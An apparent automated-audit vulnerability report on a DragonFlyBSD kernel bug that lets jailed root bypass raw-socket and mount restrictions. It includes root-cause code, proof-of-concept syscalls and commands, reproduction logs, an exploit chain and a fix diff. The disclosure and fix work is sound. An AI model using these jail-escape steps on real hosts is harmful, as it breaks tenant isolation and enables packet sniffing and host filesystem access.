DF-0165

caps_priv_check corrupts cap argument before prison_priv_check: bypasses per-cap jail policy (raw sockets + mounts in jail)

Field	Value
ID	DF-0165
Status	new
Severity	High
CVSS 3.1	CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
CWE	CWE-863 Incorrect Authorization
File	sys/kern/kern_caps.c
Lines	333-340
Area	kern
Confidence	certain
Discovered	2026-06-30
Reported	pending

Summary

caps_priv_check() mutates its cap argument in the group-handling block (:335), reducing it from the specific capability (e.g. SYSCAP_NONET_RAW = 0x61) to the group master number (e.g. 6 = SYSCAP_NONET). The mutated value is then passed to prison_priv_check() (:340), which matches the group-master case (case SYSCAP_NONET: return 0 = "allowed in jail") instead of the specific-capability case (case SYSCAP_NONET_RAW: which checks PRISON_CAP_NET_RAW_SOCKETS). This allows jailed root to create raw sockets and mount restricted filesystem types even when the corresponding jail policy toggle is disabled.

Root cause

In caps_priv_check() (sys/kern/kern_caps.c:333-340):

res = caps_check_cred(cred, cap);
if (cap & __SYSCAP_GROUP_MASK) {
    cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;  // :335
    res |= caps_check_cred(cred, cap);
}
if (res & __SYSCAP_SELF)
    return EPERM;
return (prison_priv_check(cred, cap));  // :340 — cap is now WRONG

The capability encoding: - __SYSCAP_GROUP_MASK = 0x000000F0 (bits 4-7) - __SYSCAP_GROUP_SHIFT = 4 - SYSCAP_NONET = 6 (group-0 master) - SYSCAP_NONET_RAW = 0x61 (group 6 | index 1)

When cap = SYSCAP_NONET_RAW (0x61): - Line 335: cap = (0x61 & 0xF0) >> 4 = 0x60 >> 4 = 6 - 6 is SYSCAP_NONET — the group master

In prison_priv_check() (sys/kern/kern_jail.c):

case SYSCAP_NONET:           /* line 865 */
    return (0);               /* allowed in jail */
...
case SYSCAP_NONET_RAW:        /* line 919 — NEVER REACHED */
    if (pr->pr_caps & PRISON_CAP_NET_RAW_SOCKETS)
        return (0);
    return (EPERM);

The case SYSCAP_NONET_RAW at :919 is dead code on the caps_priv_check() path — prison_priv_check always receives 6 (SYSCAP_NONET), not 0x61 (SYSCAP_NONET_RAW).

The same bypass applies to all NOMOUNT_* capabilities: SYSCAP_NOMOUNT_NULLFS/DEVFS/TMPFS/PROCFS/FUSE are reduced to SYSCAP_NOMOUNT (10) which hits case SYSCAP_NOMOUNT: return 0 (:872).

Threat model & preconditions

Attacker position: Jailed root (uid 0 inside a jail).
Impact:
Create raw IP/IPv6 sockets despite jail.net_raw_sockets=0 → packet sniffing, spoofing, attacks on other tenants.
Mount nullfs/devfs/tmpfs/procfs/fuse despite corresponding jail toggle being off → host filesystem access, device node creation.
Required config: Default kernel with jail support. The jail must have the relevant capability toggles disabled (the default).
Reachability: socket(AF_INET, SOCK_RAW, ...) from jailed root; mount -t nullfs ... from jailed root.

Proof of concept

PoC source: findings/poc/DF-0165/

Build & run

# In a jail with net_raw_sockets=0:
# From jailed root:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
# Returns 0 (success) instead of EPERM

# In a jail with vfs_mount_nullfs=0:
# From jailed root:
mount -t nullfs /host/path /inside/jail
# Succeeds instead of EPERM

Expected output

# Raw socket: succeeds (should fail with EPERM)
# Mount: succeeds (should fail with EPERM)

Impact

Jail containment is broken for all capabilities whose jail policy is conditional/EPERM while their group master policy is "allowed". This affects every DragonFlyBSD deployment that uses jails for tenant isolation. Raw socket access allows packet injection/sniffing; mount access allows host filesystem traversal. This is a cross-tenant attack vector in multi-tenant hosting environments.

Recommended fix

Do not mutate the cap variable used for the jail lookup. Use a separate local for the group-master bitmask test:

--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -331,9 +331,10 @@

    res = caps_check_cred(cred, cap);
    if (cap & __SYSCAP_GROUP_MASK) {
-       cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
-       res |= caps_check_cred(cred, cap);
+       int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+       res |= caps_check_cred(cred, gcap);
    }
    if (res & __SYSCAP_SELF)
        return EPERM;
-   return (prison_priv_check(cred, cap));
+   return (prison_priv_check(cred, cap));  /* pass ORIGINAL cap */
 }

References

sys/kern/kern_jail.c:865-866 — case SYSCAP_NONET: return 0
sys/kern/kern_jail.c:919-927 — case SYSCAP_NONET_RAW (dead code on caps_priv_check path)
sys/kern/kern_jail.c:951-975 — case SYSCAP_NOMOUNT_* (dead code)
sys/netinet/raw_ip.c:473 — caller passes SYSCAP_NONET_RAW
sys/kern/vfs_syscalls.c:152-157 — caller passes SYSCAP_NOMOUNT_*

Timeline

2026-06-30 Discovered during automated audit.

Severity: High
Status: new
Confidence: certain
CVSS 3.1: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
CWE: CWE-863
File: sys/kern/kern_caps.c
Lines: 333-340
Area: kern
Discovered: 2026-06-30
Updated: 2026-06-30

PoC verification

reproduced

Status: reproduced
Reproduced: yes
Impact: jail policy bypass: jailed root creates raw IP sockets and mounts tmpfs/nullfs/devfs/procfs inside a default-policy jail that forbids all five
Confidence: high
Tested: 2026-07-01 09:53:21
Attempts: 5
Runtime: 15s
Code hash: 9486e5252d97fe9b
Guest: DragonFly dfbsd 6.5-DEVELOPMENT DragonFly v6.5.0.1712.g89e6a-DEVELOPMENT #1: Mon Jun 29 14:18:01 UTC 2026 root@ephemeral-5c2002c44b6c:/usr/obj/usr/src/sys/X86_64_GENERIC x86_64
Build cmd: cc -O2 -Wall -o bypass bypass.c
Run cmd: sysctl jail.defaults.allow_raw_sockets jail.defaults.vfs_mount_nullfs jail.defaults.vfs_mount_tmpfs jail.defaults.vfs_mount_devfs jail.defaults.vfs_mount_procfs; ./bypass # must run as root (creates+enters jail)

jump to evidence pack ↓

PoC verification

Evidence pack

findings/poc/DF-0165 · 11 files

File	Type	Description	Size
bypass.c	trigger-source	self-contained jail-create + gated-action driver; proves cap-corruption bypass	5.2 KB	view raw
build.sh	build-script	cc -O2 -Wall -o bypass bypass.c	150 B	view raw
run.sh	run-script	echoes jail default-policy sysctls then runs ./bypass	757 B	view raw
build.log	build-log	final successful build, full output	69 B	view raw
run.log	run-log	decisive run: 5 bypasses observed	1.0 KB	view raw
run.2.log	run-log	repeat run for reproducibility	733 B	view raw
run.3.log	run-log	third repeat run for reproducibility	733 B	view raw
env.txt	environment	uname, cc version, jail default policy sysctls	703 B	view raw
VERDICT.md	verdict	full narrative + line-by-line kernel trace + recommended fix	7.2 KB	↓ raw
README.md	readme	what this pack is and how to reproduce	2.5 KB	↓ raw
manifest.json	manifest	this file	2.7 KB	view raw

README.md readme what this pack is and how to reproduce

↓ download raw

DF-0165 — PoC evidence pack

What this is

Demonstrates that caps_priv_check() in sys/kern/kern_caps.c:333-340 mutates its cap argument from the specific capability (e.g. SYSCAP_NONET_RAW = 0x61) to its group-master number (SYSCAP_NONET = 6) before forwarding it to prison_priv_check(), which has case SYSCAP_NONET: return 0 and case SYSCAP_NOMOUNT: return 0. The per-capability switch arms that actually consult the jail policy flags are dead code on this path. Result: a jailed root can do raw socket creation and tmpfs/nullfs/devfs/procfs mounts that the jail policy explicitly forbids.

See VERDICT.md for the full mechanism walkthrough and the line-by-line trace.

Reproduce

./build.sh        # cc -O2 -Wall -o bypass bypass.c
./run.sh          # creates jail with default policy, tries gated actions

Must be run as root on the guest (the test creates+enters a jail). run.sh first echoes the jail default-policy sysctls (proving they are all 0 / restrictive), then runs ./bypass.

Expected output

jail() ok: jid=N  (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
    (jail default policy: allow_raw_sockets=0,
     vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  [SYSCAP_NONET_RAW]
      -> OK fd=3   *** BYPASS ***
  mount("tmpfs",  ...)  [SYSCAP_NOMOUNT_TMPFS]   -> OK   *** BYPASS ***
  mount("null",   ...)  [SYSCAP_NOMOUNT_NULLFS]  -> OK   *** BYPASS ***
  mount("devfs",  ...)  [SYSCAP_NOMOUNT_DEVFS]   -> OK   *** BYPASS ***
  mount("procfs", ...)  [SYSCAP_NOMOUNT_PROCFS]  -> OK   *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===

On a fixed kernel every action returns EPERM instead of OK.

Why the PoC was rewritten

The original (per-finding) PoC snippet was a 4-line shell pseudocode ("from jailed root, run mount/socket"). I implemented it as a real C program (bypass.c) that:

creates the jail itself (no separate jail(8) setup needed),
attaches via jail(2) (which auto-attaches per kern_jail_attach at sys/kern/kern_jail.c:227),
drives each gated action and reports OK / EPERM per action.

Notable gotcha worth recording: the kernel's nullfs fstype is "null", not "nullfs" — get_fscap()'s strncmp("null", fsname, 5) only matches the bare name. Using mount("nullfs", ...) makes the syscall hit a different (default) cap and fail for an unrelated reason; using mount("null", ...) exercises the actual SYSCAP_NOMOUNT_NULLFS path and demonstrates the bypass cleanly.

VERDICT.md verdict full narrative + line-by-line kernel trace + recommended fix

↓ download raw

DF-0165 — caps_priv_check cap-corruption -> jail policy bypass

Verdict: REPRODUCED (5 distinct cap-gated actions bypass jail policy)

Inside a jail created with the default restrictive policy (allow_raw_sockets=0, vfs_mount_{nullfs,tmpfs,devfs,procfs}=0), a jailed root (uid 0) successfully:

opens a raw IPv4 socket (socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) — SYSCAP_NONET_RAW
mounts tmpfs — SYSCAP_NOMOUNT_TMPFS
mounts nullfs — SYSCAP_NOMOUNT_NULLFS (using kernel fstype "null")
mounts devfs — SYSCAP_NOMOUNT_DEVFS
mounts procfs — SYSCAP_NOMOUNT_PROCFS

On a fixed kernel, each of these returns EPERM because the per-capability jail policy flag is clear. On this build they all succeed, proving the bypass.

Mechanism (root cause confirmed line-by-line)

In sys/kern/kern_caps.c:333-340:

res = caps_check_cred(cred, cap);                       /* :333 */
if (cap & __SYSCAP_GROUP_MASK) {                        /* :334 */
    cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;   /* :335 -- MUTATES cap */
    res |= caps_check_cred(cred, cap);                  /* :336 */
}
if (res & __SYSCAP_SELF)
    return EPERM;
return (prison_priv_check(cred, cap));                  /* :340 -- passes MUTATED cap */

For a per-capability value like SYSCAP_NONET_RAW = __SYSCAP_GROUP_6 | 1 = 0x61:

:334 cap & __SYSCAP_GROUP_MASK = 0x61 & 0xF0 = 0x60 (truthy)
:335 cap = (0x61 & 0xF0) >> 4 = 0x6 (= SYSCAP_NONET, the group master)
:340 prison_priv_check(cred, 0x6) — the specific cap (0x61) is never sent

In prison_priv_check (sys/kern/kern_jail.c:854-978):

case SYSCAP_NONET:                  /* :865-866  group master: ALLOWED */
    return 0;
...
case SYSCAP_NOMOUNT:                /* :872,878  group master: ALLOWED */
    return 0;
...
case SYSCAP_NONET_RAW:              /* :919-927  per-capability check -- DEAD on this path */
    if (PRISON_CAP_ISSET(pr->pr_caps, PRISON_CAP_NET_RAW_SOCKETS)) return 0;
    return EPERM;

The case SYSCAP_NONET_RAW and the case SYSCAP_NOMOUNT_* branches are dead code on the caps_priv_check() path — prison_priv_check always receives the group-master number and matches the unconditional return 0 case, so the per-capability PRISON_CAP_* flag is never consulted.

Encoding reference (`sys/sys/caps.h`)

__SYSCAP_GROUP_MASK   = 0x000000F0    (bits 4..7)
__SYSCAP_GROUP_SHIFT  = 4
__SYSCAP_XFLAGS       = 0x7FFF0000    (e.g. __SYSCAP_NULLCRED, NOROOTTEST)

Group-0 master caps (these match the "ALLOWED in jail" cases):
  SYSCAP_NONET        = 0x06    -> prison_priv_check returns 0  (allowed)
  SYSCAP_NOMOUNT      = 0x0A    -> prison_priv_check returns 0  (allowed)

Per-capability values (their *specific* switch arms are the real policy):
  SYSCAP_NONET_RAW      = 0x61  -> corrupted to 0x6 -> matches SYSCAP_NONET
  SYSCAP_NOMOUNT_NULLFS = 0xA0  -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_DEVFS  = 0xA1  -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_TMPFS  = 0xA2  -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_FUSE   = 0xA4  -> corrupted to 0xA -> matches SYSCAP_NOMOUNT
  SYSCAP_NOMOUNT_PROCFS = 0xA5  -> corrupted to 0xA -> matches SYSCAP_NOMOUNT

Caller chain (where the bypass matters)

sys/netinet/raw_ip.c:473 — rip_attach calls caps_priv_check(ai->p_ucred, SYSCAP_NONET_RAW | __SYSCAP_NULLCRED). With cap = 0x00020061, the corruption still reduces it to 6: 0x00020061 & 0xF0 = 0x60, >> 4 = 6.
sys/kern/vfs_syscalls.c:152-157 — sys_mount calls caps_priv_check_td(td, priv) where priv = get_fscap(fstypename). get_fscap() returns the specific SYSCAP_NOMOUNT_* value, which is corrupted to SYSCAP_NOMOUNT.

Threat model

Attacker position: jailed root (uid 0 inside a jail).
What the attacker gets:
Raw IP sockets despite jail.defaults.allow_raw_sockets=0. Enables packet sniffing, IP-spoofed packet injection, ICMP attacks against other tenants / host.
Mount nullfs / tmpfs / devfs / procfs inside the jail despite jail.defaults.vfs_mount_*=0. Mounting devfs exposes device nodes; mounting nullfs over a host-visible path bypasses filesystem-level isolation; mounting procfs exposes host process metadata.
Preconditions: default DragonFlyBSD jail (no special config required).
Reachability: trivial — socket(AF_INET, SOCK_RAW, IPPROTO_RAW) and mount("tmpfs", target, 0, NULL) from jailed root.

Demonstration

---- jail default policy (should all be 0): ----
jail.defaults.allow_raw_sockets: 0
jail.defaults.vfs_mount_nullfs: 0
jail.defaults.vfs_mount_tmpfs: 0
jail.defaults.vfs_mount_devfs: 0
jail.defaults.vfs_mount_procfs: 0
---- running bypass as root (will create + enter jail): ----
jail() ok: jid=11  (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
    (jail default policy: allow_raw_sockets=0,
     vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  [SYSCAP_NONET_RAW]
      -> OK fd=3   *** BYPASS ***
  mount("tmpfs", /tmp/df0165-mnt-tmpfs)  [SYSCAP_NOMOUNT_TMPFS]
      -> OK   *** BYPASS ***
  mount("null", /tmp/df0165-mnt-nullfs)  [SYSCAP_NOMOUNT_NULLFS]
      -> OK   *** BYPASS ***
  mount("devfs", /tmp/df0165-mnt-devfs)  [SYSCAP_NOMOUNT_DEVFS]
      -> OK   *** BYPASS ***
  mount("procfs", /tmp/df0165-mnt-procfs)  [SYSCAP_NOMOUNT_PROCFS]
      -> OK   *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===

Reproduced 3 times in a row (see run.log, run.2.log, run.3.log); every run yields the same 5 bypasses. The only inter-run difference is the jid= value, which is just an incrementing jail counter.

Notes / minor adjacent issues (not part of DF-0165)

get_fscap() in sys/kern/vfs_syscalls.c:5386 matches strncmp("null", fsname, 5), which does NOT match the user-visible fstype "nullfs". The kernel fstype for nullfs is "null" (its vfsconf vfc_name). Anyone calling mount("nullfs", ...) falls through to the SYSCAP_RESTRICTEDROOT default — a separate latent surprise that the PoC works around by using "null".
The same corruption affects SYSCAP_NONET_BT_RAW, SYSCAP_NONET_ROUTE, SYSCAP_NONET_IFCONFIG, etc., but those callers either route through a different cap or the action is independently gated. The five actions demonstrated here are the directly observable wins.

Recommended fix (matches the finding's diff)

Don't mutate the cap variable used for the jail lookup. Use a separate local for the group-master test:

--- a/sys/kern/kern_caps.c
+++ b/sys/kern/kern_caps.c
@@ -331,9 +331,10 @@

    res = caps_check_cred(cred, cap);
    if (cap & __SYSCAP_GROUP_MASK) {
-       cap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
-       res |= caps_check_cred(cred, cap);
+       int gcap = (cap & __SYSCAP_GROUP_MASK) >> __SYSCAP_GROUP_SHIFT;
+       res |= caps_check_cred(cred, gcap);
    }
    if (res & __SYSCAP_SELF)
        return EPERM;
-   return (prison_priv_check(cred, cap));
+   return (prison_priv_check(cred, cap));   /* ORIGINAL specific cap */
 }

After the fix, the PoC should output EPERM for every action (policy honored).

Detail

Exploit chain

root on host -> jail(path=/, default policy all 0) auto-attaches via kern_jail_attach -> inside jail, attempt cap-gated action -> caps_priv_check() corrupts cap from specific value (0x61/0xA0/0xA1/0xA2/0xA5) to group-master (6 or 10) -> prison_priv_check() returns 0 unconditionally -> action succeeds despite jail policy=0. Demoed wins: raw IPv4 socket (packet sniff/inject), tmpfs/nullfs/devfs/procfs mounts inside jail (devfs exposes device nodes, nullfs exposes host paths, procfs exposes host process metadata). No heap grooming needed - this is a pure logic/authz bypass.

Evidence (decisive lines)

jail() ok: jid=11  (now jailed as uid=0)
=== DF-0165 demo: cap-gated actions inside jail ===
    (jail default policy: allow_raw_sockets=0,
     vfs_mount_{nullfs,tmpfs,devfs,procfs}=0 -> all should EPERM)
  socket(AF_INET, SOCK_RAW, IPPROTO_RAW)  [SYSCAP_NONET_RAW]
      -> OK fd=3   *** BYPASS ***
  mount("tmpfs", /tmp/df0165-mnt-tmpfs)  [SYSCAP_NOMOUNT_TMPFS]  -> OK   *** BYPASS ***
  mount("null", /tmp/df0165-mnt-nullfs)  [SYSCAP_NOMOUNT_NULLFS] -> OK   *** BYPASS ***
  mount("devfs", /tmp/df0165-mnt-devfs)  [SYSCAP_NOMOUNT_DEVFS]  -> OK   *** BYPASS ***
  mount("procfs", /tmp/df00165-mnt-procfs) [SYSCAP_NOMOUNT_PROCFS] -> OK   *** BYPASS ***
=== end: 5 cap-gated action(s) bypassed jail policy ===
jail.defaults.allow_raw_sockets/vfs_mount_{nullfs,tmpfs,devfs,procfs} all = 0

PoC changes

Rewrote the per-finding PoC (a 4-line shell pseudocode snippet) as a real C program 'bypass.c' that creates a jail via jail(2), auto-attaches, and attempts all five cap-gated actions reporting OK/EPERM each. Discovered and worked around a separate latent bug in get_fscap() (sys/kern/vfs_syscalls.c:5386): its strncmp("null",fsname,5) only matches the bare fstype "null", not "nullfs" - using "null" exercises the actual SYSCAP_NOMOUNT_NULLFS path and proves the bypass. Added run.sh that first echoes the restrictive jail default-policy sysctls as evidence the policy is off.

Verified recommended fix

In sys/kern/kern_caps.c caps_priv_check(), stop reusing cap for the group-master test -- use a separate local gcap so the ORIGINAL specific capability reaches prison_priv_check(); matches finding proposal. Full git-apply-able diff in findings/poc/DF-0165/fix.diff.

Verdict

REPRODUCED. caps_priv_check() at sys/kern/kern_caps.c:335 mutates the cap argument (e.g. SYSCAP_NONET_RAW=0x61) to its group-master number (6=SYSCAP_NONET) before forwarding it to prison_priv_check() at :340; in prison_priv_check() the corrupted value matches case SYSCAP_NONET: return 0 (kern_jail.c:865-866) / case SYSCAP_NOMOUNT: return 0 (kern_jail.c:872,878), so the per-capability switch arms that actually consult PRISON_CAP_* (kern_jail.c:919-975) are dead code on this path. I verified this line-by-line in sys/, then built a self-contained PoC (bypass.c) that creates a jail via jail(2) with the default restrictive policy and attempts every gated action: socket(AF_INET,SOCK_RAW,IPPROTO_RAW), mount(tmpfs/null/devfs/procfs) all succeed (output ends with '5 cap-gated action(s) bypassed jail policy'); on a fixed kernel each would return EPERM. Reproduced 3x with identical results.

caps_priv_check corrupts cap argument before prison_priv_check: bypasses per-cap jail policy (raw sockets + mounts in jail)

Summary

Root cause

Threat model & preconditions

Proof of concept

Build & run

Expected output

Impact

Recommended fix

References

Timeline

PoC verification

Evidence pack

DF-0165 — PoC evidence pack

What this is

Reproduce

Expected output

Why the PoC was rewritten

DF-0165 — caps_priv_check cap-corruption -> jail policy bypass

Verdict: REPRODUCED (5 distinct cap-gated actions bypass jail policy)

Mechanism (root cause confirmed line-by-line)

Encoding reference (sys/sys/caps.h)

Caller chain (where the bypass matters)

Threat model

Demonstration

Notes / minor adjacent issues (not part of DF-0165)

Recommended fix (matches the finding's diff)

Confirmed kernel references

Detail

Exploit chain

Evidence (decisive lines)

PoC changes

Verified recommended fix

Verdict

Encoding reference (`sys/sys/caps.h`)